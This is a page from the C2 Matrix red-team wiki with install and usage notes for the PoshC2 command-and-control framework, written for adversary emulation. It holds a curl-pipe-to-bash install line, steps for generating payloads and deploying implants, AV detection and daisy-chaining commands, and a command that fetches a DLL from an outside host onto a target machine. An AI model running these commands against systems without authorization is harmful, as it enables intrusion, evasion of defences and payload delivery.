C2 Matrix
  • The C2 Matrix
  • About
  • SANS Slingshot C2 Matrix VM
  • Contribute
  • Feedback
  • Lab Infrastructure
    • C2 Matrix Eval Lab
    • Basic Lab
    • Virtual Machines with C2s
    • Docker
    • Resources
  • C2
    • Caldera
    • Covenant
    • Deimos
    • Empire3
    • Empire5
    • Havoc
    • ibombshell
    • Koadic
    • Merlin
    • Mythic
    • Nuages
    • PoshC2
    • PowerHub
    • SilentTrinity
    • Sliver
    • SCYTHE
    • TrevorC2
  • Attack Infrastructure
    • Resources
    • Redirectors/Relays
  • Detection
    • Basics
    • Beacons
    • JA3/JA3S Hashes
    • JARM
Powered by GitBook
On this page
  • Install PoshC2
  • Configure and Run PoshC2
  • Launch Server
  • Launch Handler
  • Deploy Agent
  • Emulate TTPs
  • Run PowerShell Scripts
  • Chaining
  • Download a file
  • Other Resources

Was this helpful?

  1. C2

PoshC2

PreviousNuagesNextPowerHub

Last updated 4 years ago

Was this helpful?

PoshC2 is pretty well documented, below are my notes. Best to use the official documentation:

Demo of PoshC2 is in this and event:

Install PoshC2

sudo su -
curl -sSL https://raw.githubusercontent.com/nettitude/PoshC2/master/Install.sh | bash

Configure and Run PoshC2

sudo su -
cd /opt/PoshC2
posh-project -n test
posh-config

Modify the values in the file, consider: BindIP; PayloadCommsHost; UserAgent

Launch Server

sudo su -
posh-server

On launch, PoshC2 generates a number of payloads into /opt/PoshC2_Project and creates a quick start file.

 cat /opt/PoshC2_Project/quickstart.txt

Launch Handler

sudo su -
posh -u georgy

Deploy Agent

Use the multitude of methods to deploy the agent from the quickstart.txt file.

Emulate TTPs

Run PowerShell Scripts

loadmodule /home/slingshot/CozyBear/stepTwelve.ps1 
detectav
software

Chaining

Run the following command from the implant you want to use as the daisy server.

startdaisy

Download a file

web-upload-file -from 'https://mint.scythedemo.com/ServiceLogin?passive=Gc5H5HZdakKD8ZWuaUcX2Q&b=true' -to 'C:\Users\Jorge\Desktop\scythe.dll'

Other Resources

https://redteaming.co.uk/2020/06/26/poshc2-shellcode-and-binary-patching/
https://yaksas.in/ycscblog/poshc2-a-red-teamers-notes/
https://poshc2.readthedocs.io/en/latest/
Red Team Village
Texas Cyber Summit
June'gle